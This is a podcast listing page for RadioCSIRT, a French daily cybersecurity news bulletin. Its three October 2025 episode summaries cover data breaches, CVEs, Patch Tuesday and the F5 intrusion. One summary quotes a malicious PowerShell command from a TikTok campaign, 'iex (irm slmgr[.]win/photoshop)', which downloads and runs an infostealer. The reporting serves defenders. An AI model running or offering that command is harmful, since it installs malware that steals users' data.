🔴 RadioCSIRT : L’Actu Cyber Qui Protège Votre Quotidien ! ⚡️ Titelbild

🔴 RadioCSIRT : L’Actu Cyber Qui Protège Votre Quotidien ! ⚡️

🔴 RadioCSIRT : L’Actu Cyber Qui Protège Votre Quotidien ! ⚡️

Von: Marc Frédéric GOMEZ
Jetzt kostenlos hören, ohne Abo

Über diesen Titel

🎙 Marc Frédéric Gomez, expert en cybersécurité, vous livre chaque jour l’essentiel des menaces, attaques et stratégies de défense à connaître.

🔎 Au programme :
✔️ Décryptage des cyberattaques et vulnérabilités critiques
✔️ Veille stratégique pour les CSIRT, CERT et pros de la cybersécurité
✔️ Sources et références pour approfondir chaque sujet

💡 Pourquoi écouter RadioCSIRT ?
🚀 Restez à jour en quelques minutes par jour
🛡️ Anticipez les menaces avec des infos fiables et techniques
📢 Une veille indispensable pour les pros de l’IT et de la sécurité

🔗 Écoutez, partagez et sécurisez votre environnement !
📲 Abonnez-vous et laissez une note ⭐ sur votre plateforme préférée !

Marc Frederic GOMEZ
Politik & Regierungen
  • RadioCSIRT - Votre actu cybersécurité du vendredi 17 octobre 2025 (Ép.457)
    Oct 17 2025
    Bienvenue dans votre bulletin cybersécurité du jour ⚡️ 🛫 American Airlines / Envoy Air — Fuite de données Oracle E-Business Suite Envoy Air, filiale d’American Airlines, confirme une compromission sur son application Oracle E-Business Suite, après la revendication du groupe Clop.Selon la compagnie, aucune donnée client sensible n’a été touchée, mais un volume limité d’informations commerciales a pu être exfiltré. La campagne d’extorsion est liée à l’exploitation d’une faille zero-day, la CVE-2025-61882, précédant un correctif discret d’Oracle sur la CVE-2025-61884. 👮 Europol — Démantèlement d’un réseau international de SIM-box L’opération SIMCARTEL a permis de démanteler un service illégal de location de cartes SIM.1 200 dispositifs et 40 000 SIM étaient utilisés dans plus de 3 200 fraudes, causant 4,5 millions d’euros de pertes.Deux sites web, gogetsms.com et apisim.com, ont été saisis.Sept personnes ont été arrêtées, et plus de 49 millions de comptes frauduleux ont été créés à travers ce réseau. 📦 Apache ActiveMQ — Vulnérabilité critique CVE-2025-54539 Une faille critique d’exécution de code à distance affecte Apache ActiveMQ NMS AMQP Client jusqu’à la version 2.3.0.Origine : désérialisation non fiable de données (CWE-502) lors de connexions à un broker AMQP malveillant.Score CVSS 9.8, sans privilèges ni interaction. Corrigée en version 2.4.0, supprimant le mécanisme vulnérable. 🎬 TikTok — Campagne PowerShell diffusant AuroStealer Des vidéos TikTok diffusent de faux outils d’activation logicielle, incitant à exécuter la commande PowerShell : iex (irm slmgr[.]win/photoshop) Celle-ci télécharge un script malveillant, puis un exécutable AuroStealer chargé de voler des données. Persistance via tâches planifiées Windows et auto-compilation à la volée via csc.exe, permettant une exécution en mémoire sans trace sur disque. 📨 Zendesk — Détournement massif des workflows de support Des acteurs malveillants exploitent l’absence d’authentification dans certaines instances Zendesk. Résultat : des milliers de messages automatiques envoyés via les domaines clients, saturant les boîtes mail cibles. Les tickets anonymes et les déclencheurs automatiques ont permis cette attaque en masse, que Zendesk qualifie d’abus distribué « many-against-one ». ⚖️ Affaire BreachForums — Entre défi technique et dérive judiciaire Cinq individus ont été interpellés en France entre février et juin 2025, soupçonnés d’être liés à BreachForums et à plusieurs pseudonymes connus : IntelBroker, ShinyHunters, Hollow, Noct, et Depressed. Leurs avocats décrivent un mélange d’immaturité et de savoir-faire technique, sans motivation financière. Malgré ces arrestations, le site a brièvement rouvert en juillet avant d’être de nouveau fermé par le FBI et la BL2C. ⚡️ On ne réfléchit pas, on patch ! 📚 Sources : https://www.bleepingcomputer.com/news/security/american-airlines-subsidiary-envoy-confirms-oracle-data-theft-attack/ https://www.bleepingcomputer.com/news/security/europol-dismantles-sim-box-operation-renting-numbers-for-cybercrime/ https://thecyberthrone.in/2025/10/17/apache-activemq-affected-by-cve-2025-54539/ https://cyberpress.org/tiktok-powershell-malware/ https://krebsonsecurity.com/2025/10/email-bombs-exploit-lax-authentication-in-zendesk/ https://www.zdnet.fr/actualites/affaire-breachforums-les-mis-en-cause-voulaient-challenger-la-securite-des-grands-groupes-483565.htm 📞 Partagez vos retours : 📱 07 68 72 20 09 📧 radiocsirt@gmail.com 🌐 https://www.radiocsirt.org 📰 https://radiocsirt.substack.com #CyberSécurité #CERT #SOC #ThreatIntel #Oracle #Clop #ActiveMQ #CVE202554539 #AuroStealer #TikTok #Zendesk #Europol #SIMBox #BreachForums #RadioCSIRT
    Mehr anzeigen Weniger anzeigen
    15 Min.
  • RadioCSIRT — Patch Tuesday octobre 2025 (Ép.456)
    Oct 17 2025

    Bienvenue dans votre bulletin spécial Patch Tuesday d’octobre 2025 ⚡️

    🧩 Microsoft — 172 vulnérabilités corrigées, 6 zero-days
    Le Patch Tuesday d’octobre corrige 172 failles, dont 6 zero-days et 8 vulnérabilités critiques.
    Fin de support pour Windows 10, remplacé par le programme Extended Security Updates (ESU).

    Les zero-days exploitées sont :

    • CVE-2025-24990 — Agere Modem Driver, élévation de privilèges, pilote supprimé du système. Attribution : Fabian Mosch et Jordan Jay.
    • CVE-2025-59230 — Windows Remote Access Connection Manager, élévation de privilèges locale, exploitation active. Attribution : MSTIC et MSRC.
    • CVE-2025-47827 — Secure Boot bypass dans IGEL OS avant la version 11, découverte par Zack Didcott.
    • Les zero-days divulguées publiquement :
    • CVE-2025-0033 — AMD EPYC SEV-SNP, corruption RMP lors de l’initialisation. Chercheurs : Benedict Schlueter, Supraja Sridhara, Shweta Shinde (ETH Zurich).
    • CVE-2025-24052 — Variante de la faille Agere Modem, exploitable même sans modem actif.
    • CVE-2025-2884 — TCG TPM 2.0, lecture hors limites, risque de divulgation d’informations. Attribution : Trusted Computing Group et chercheur anonyme.

    🚨 CVE-2025-59287 — Windows Server Update Services (WSUS)
    Faille critique d’exécution de code à distance, score CVSS 9.8.
    Vecteur réseau, aucune authentification requise. Microsoft qualifie l’exploitation comme « plus probable ».

    📄 Microsoft Office et composants associés
    Plusieurs vulnérabilités RCE via le Preview Pane (CVE-2025-59227, CVE-2025-59234).
    Correctifs aussi pour Azure, Entra ID, Copilot, Kernel, BitLocker, Exchange, SharePoint, .NET et Visual Studio.

    🔧 Autres éditeurs — Mises à jour d’octobre 2025

    Adobe : correctifs multiples.

    • Cisco : IOS, UCM, Cyber Vision Center.
    • Draytek : RCE pré-auth sur routeurs Vigor.
    • Gladinet : zero-day CentreStack activement exploitée.
    • Ivanti : correctifs pour EPMM et Neurons for MDM.
    • Oracle : deux zero-days dans E-Business Suite.
    • Redis : RCE de sévérité maximale.
    • SAP : faille critique d’exécution de commande dans NetWeaver.
    • Synacor : zero-day dans Zimbra Collaboration Suite exploitée pour vol de données.

    🧭 Cycle de vie Microsoft
    Derniers correctifs gratuits pour Windows 10, Office 2016/2019, Exchange 2016/2019.
    Remplacement d’Exchange Server par Exchange Server Subscription Edition.

    ⚡️ On ne réfléchit pas, on patch !

    📚 Sources :
    https://krebsonsecurity.com/2025/10/patch-tuesday-october-2025-end-of-10-edition/
    https://www.bleepingcomputer.com/news/microsoft/microsoft-october-2025-patch-tuesday-fixes-6-zero-days-172-flaws/
    https://www.rapid7.com/blog/post/em-patch-tuesday-october-2025/

    📞 Partagez vos retours :
    📱 07 68 72 20 09
    📧 radiocsirt@gmail.com
    🌐 https://www.radiocsirt.org
    📰 https://radiocsirt.substack.com

    #CyberSécurité #PatchTuesday #Microsoft #CERT #CVE #ZeroDay #Windows10 #WSUS #Office #Azure #Exchange #TPM #AMD #RCE #Update #RadioCSIRT

    Mehr anzeigen Weniger anzeigen
    8 Min.
  • RadioCSIRT — Votre actu cybersécurité du jeudi 16 octobre 2025 (Ép.455)
    Oct 16 2025

    Bienvenue dans votre bulletin d'actualités cybersécurité ⚡️

    🔥 F5 Networks — Intrusion majeure par acteur étatique
    F5 révèle une compromission détectée le 9 août 2025. Un acteur étatique sophistiqué a maintenu un accès persistant long terme dans les environnements de développement BIG-IP. Code source exfiltré, informations sur des vulnérabilités non publiques dérobées.

    La CISA publie la directive d'urgence 26-01 ordonnant aux agences fédérales de patcher avant le 22 octobre.

    Le NCSC britannique émet également une alerte. Risque : exploitation des produits F5 pour voler credentials et clés API, permettant mouvements latéraux et accès persistants dans les réseaux cibles.

    📊 CERT-FR — 46 vulnérabilités corrigées dans l'écosystème F5
    Le CERT-FR publie l'avis CERTFR-2025-AVI-0886. F5 corrige 46 CVE dans son bulletin K000156572 du 15 octobre. Impacts multiples : RCE, élévation de privilèges, SSRF, XSS et déni de service. Tous les BIG-IP sont concernés : versions 15.1.x, 16.1.x, 17.1.x et 17.5.x nécessitent une mise à jour immédiate. Également touchés : BIG-IP Next CNF, BIG-IP Next pour Kubernetes, BIG-IP Next SPK et NGINX App Protect WAF avant la version 4.7.0.

    💬 Mattermost — Multiples failles de sécurité
    Le CERT-FR alerte via l'avis CERTFR-2025-AVI-0888 sur six bulletins de sécurité Mattermost publiés le 15 octobre : MMSA-2025-00465, 00492, 00493, 00518, 00540 et 00541. Versions vulnérables : Mattermost Server 10.5.x avant 10.5.12, 10.10.x avant 10.10.3, 10.11.x avant 10.11.4, 10.12.x avant 10.12.1, et toutes les versions 11.x avant 11.0.0. La nature exacte des risques n'est pas précisée par l'éditeur.

    🚨 Adobe Experience Manager — CVE-2025-54253 exploitée activement
    La CISA ajoute la CVE-2025-54253 à son catalogue KEV. Score CVSS 10.0 sur 10. Exploitation active confirmée dans la nature. Cette faille de mauvaise configuration affecte Adobe Experience Manager Forms versions 6.5.23 et antérieures, permettant une RCE sans authentification ni interaction utilisateur. Découverte par Adam Kues et Shubham Shah de Searchlight Cyber, divulguée le 28 avril, patchée en août. Un proof-of-concept est public. Deadline CISA pour les agences fédérales : 5 novembre 2025.

    ⚡️ On ne réfléchit pas, on patch !

    📚 Sources :
    https://www.ncsc.gov.uk/news/confirmed-compromise-f5-network
    https://www.cisa.gov/news-events/news/cisa-issues-emergency-directive-address-critical-vulnerabilities-f5-devices https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0886/ https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0888/ https://www.bleepingcomputer.com/news/security/cisa-maximum-severity-adobe-flaw-now-exploited-in-attacks/

    📞 Partagez vos retours :
    📱 07 68 72 20 09
    📧 radiocsirt@gmail.com
    🌐 https://www.radiocsirt.org
    📰 https://radiocsirt.substack.com

    #Cybersécurité #ThreatIntel #CERT #SOC #F5 #CISA #NCSC #Adobe #AEM #RCE #Mattermost #Patch #EmergencyDirective #KEV

    Mehr anzeigen Weniger anzeigen
    5 Min.
Noch keine Rezensionen vorhanden